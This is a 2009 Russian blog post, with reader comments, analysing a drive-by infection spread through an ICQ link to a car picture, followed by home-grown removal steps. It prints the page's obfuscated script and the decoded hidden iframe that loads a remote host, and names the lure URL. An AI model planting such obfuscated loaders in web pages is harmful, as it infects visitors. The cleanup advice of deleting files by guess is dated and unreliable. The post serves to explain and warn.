Добавить мнение Твое Мнение .info
Ваше мнение имеет значение
Интересное

Меню сайта

Поиск
Расширенный поиск

новые фильмы


Онлайн всего: 1
Гостей: 1
Пользователей: 0
Приветствую Вас, Гость 17.01.2018, 12:56
Мнения » 2009 » Ноябрь » 8 » Как заражаются вирусом через картинку
Оценка

Как заражаются вирусом через картинку

08.11.2009 00:25
В последнее время все больше и больше людей, обычных юзеров и опытных пользователей заражаются вирусами подобным способом. Я тоже оказался в их числе, но отчасти сделал это сознательно. И сейчас хочу рассказать, как же все таки происходит заражение и какие первые шаги по ликвидации угрозы следует принять.

1. ЗАРАЖЕНИЕ

Как правило весь процесс заражения начинается с безобидной ссылки от пользователя, друга или подруги, который имеется в контактном листе вашего ICQ-клиента. А именно, вам приходит подобное сообщение:

смотри _http://satorilight.com/images/car.gif :)

(только символа "_" нет в начале ссылки, и она получается кликабельной)

После перехода по ссылке (ЭТО НЕЛЬЗЯ ДЕЛАТЬ НИ В КОЕМ СЛУЧАЕ!!!) вам откроется картинка

На первый взгляд ничего подозрительного. Обычная картинка и многие любители авто вероятно даже самостоятельно разошлют ее своим друзьям. Этим самым они запустят новую волну распространения вируса.

Сама по себе картинка вирусом не является. Но помимо картинки, на странице присутствует еще кое-что, невидимое пользователю. Если посмотреть исходный код (source), то можно заметить, что страница с картинкой содержит следующий код:

<img src="WorleyVision5.jpg">

<script>
document.write(String.fromCharCode
(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,
115,99,114,105,112,116,34,32,115,114,99,61,34,106,115,46,106,115,34,62,60,47,115,99,
114,105,112,116,62))</script>

<img src="WorleyVision5.jpg"> - эта часть кода выводит картинку с авто. А следующий за ней код, что бы уловить суть, следует перевести в более понятный вид:

<script type="text/javascript"> src="js.js"></script>

Т.е. параллельно с загрузкой картинки, выполняется некий скрипт js.js. Смотрим, что находится внутри этого скрипта:

document.write
('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0069\u0074\u006d\u0061\u0073\u0074\u0065\u0072\u007a\u002e\u006f\u0072\u0067\u002f\u0073\u0074\u0061\u0074\u0073\u002f\u0072\u0075\u0031\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')

Снова абракадабра, которую можно привести к более понятному виду. В результате получаем:

<iframe src="_http://itmasterz.org/stats/ru1.php" style="display:none"></iframe>

(только без символа "_" перед http)

Этот код описывает создание невидимого для пользователя ифрейма (окошка), в котором открывается ссылка _http://itmasterz.org/stats/ru1.php. Что делает файл ru1.php я так и не узнал. Но скорее всего именно он, используя определенную уязвимость, подгружает вредосный код (образно говоря - вирус).

Итак, что же происходит при открытии картинки:

1. загружается картинка (вы это видите) :)
2. происходит выполнение скрипта js.js
3. скрипт js.js создает невидимый для пользователя ифрейм (окошко), в котором открывается ссылка _http://itmasterz.org/stats/ru1.php
4. происходит выполнение файла ru1.php, который загружает (сам, либо использует еще один промежуточный скрипт) вредоносный код на ваш компьютер.

Причем, скорее всего на ваш компьютер загрузится "вирус", который в первое время ничего плохого не сделает, а будет ожидать своей "активации". Поэтому очень важно своевременно предпринять какие либо действия по удалению этого самого "вируса".

2. УДАЛЕНИЕ ВИРУСА

Даже если вы не открывали никаких ссылок и на 100% уверены в отсутствии вирусов, все равно ОБЯЗАТЕЛЬНО выполните следующие шаги. Возможно вы просто не подозреваете о наличии угрозы.

1. Скачиваем следующую утилиту - Dr.Web CureIt. Она бесплатная, хорошо ищет и лечит вирусы, содержит последние базы обновлений. Отличная вещь!

2. Выдергиваем с компа сетевой кабель.

3. Проверяем утилитой Dr.Web CureIt диск, на котором установлена Windows (как правило диск С)

4. По окончании проверки смотрим отчет. У меня были найдены следующие вирусы:
trojan.click.26075
js.click.26
win32.hllw.autohit.3438
trojan.download.51375

Все эти вирусы были успешно удалены утилитой Dr.Web CureIt

5. Далее идем в папку C:\WINDOWS. Сортируем в ней файлы по дате создания. Смотрим внимательно на файлы, созданные сегодня и последние созданные файлы (если вы делаете все это для профилактики). Удаляем все подозрительные* файлы. У себя я обнаружил скрытый (незабываем включить показ скрытых файлов) файл bootstat.dat. Также показался подозрительным (ему там явно не место) файл wcx_ftp.ini, который содержал все используемые мной FTP логины (пароли ведь мы не сохраняем, правда? :) ) для FTP-клиентов. Эти два файла были незамедлительно удалены.

Далее проделываем такие же операции с папками
C:\WINDOWS\system32\
C:\WINDOWS\system32\drivers\
C:\WINDOWS\system\

и удаляем подозрительные* файлы.

6. Перегружаем комп.

7. Выполняем пункты 3, 4, 5 повторно. Если вирусов не найдено, и в указанных выше папках не создались новые подозрительные* файлы, то выполняем следующий пункт.

8. Проверяем утилитой Dr.Web CureIt весь компьютер (все диски).

* Подозрительные - это в первую очередь .bat, .dat, .exe файлы. Если не уверены нужен какой-то файл или нет, то предварительно переместите его в другую папку (например, в папку TMP, предварительно созданную на другом диске). Перезагрузите компьютер, если все работает - значит файл был лишним :) . Подозрительность файла можно проверить написав его имя в Yandex или Google. Просмотрите результаты поиска - вирусные файлы обязательно "всплывут".

Если после выполнения пункта 7 были найдены вирусы, то я бы вам рекомендовал не морочить себе голову и просто отформатировать диск С. Переустановите Windows заново и все будет ОК! У меня после выполнения повторной проверки вирусы не обнаружились, но спустя пару часов NOD32, работающий в режиме real time проверки, обнаружил вирус в файле
C:\WINDOWS\Temp\AMWC8E5.tmp - вероятно модифицированный Win32/Prorat троян
а через минут 10 обнаружил и другой вирус в том же месте
C:\WINDOWS\Temp\AMW30B3.tmp - вероятно модифицированный Win32/Agent троян
Оба вируса были успешно удалены и до сих пор все тихо и спокойно.

3. РЕКОМЕНДАЦИИ

1. Используйте браузер Firefox и всегда обновляйте его до последней версии.

2. При пользовании Интернет всегда запускайте антивирус (какой - решать вам)

3. Периодически проверяйте комп бесплатной утилитой Dr.Web CureIt (каждый раз скачивайте актуальную версию)

4. Установите программу для защиты от вирусов с usb флэш карт USB Disk Security. Она лучше других проверяет вирусы на флэшке при ее подключении.

Да, вот и все. Я специально не стал писать, что не нужно лазить по "плохим" сайтам и нажимать на "плохие" ссылки - это бесполезно. Все это и так знают, но все равно ищут порно, ключи для касперского (например) и кликают по ссылкам из спама (почта, аська и т.д).

Удачи! И будьте всегда бдительны! :)

Категория: Другое | Просмотров: 8994 | Добавил: 2z | Рейтинг: 5.0/1 |

Всего комментариев: 4
[1]    CalmDen    (13.11.2009 19:08)
Спасибо, учту. Кстати я использую NOD32, меня устраивает.
Ответ: Меня тоже вполне устраивает НОД32. Но данную угрозу он пропустил.

[2]    qqq    (14.11.2009 17:45)
Советую всем "Microsoft security essentials"

+1   Спам
[3]    2z    (15.11.2009 00:22)
как то мелкомягкие уж никак не заслуживают доверия в области безопасности... biggrin

[4]    CalmDen    (15.11.2009 01:55)
Точняк. wink Кстати, картинка в статье классная (ноутбук). smile

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]

Copyright © 2007-2018
Твое Мнение
restaurants Blogs - Blog Catalog Blog Directory
Каталог TUT.BY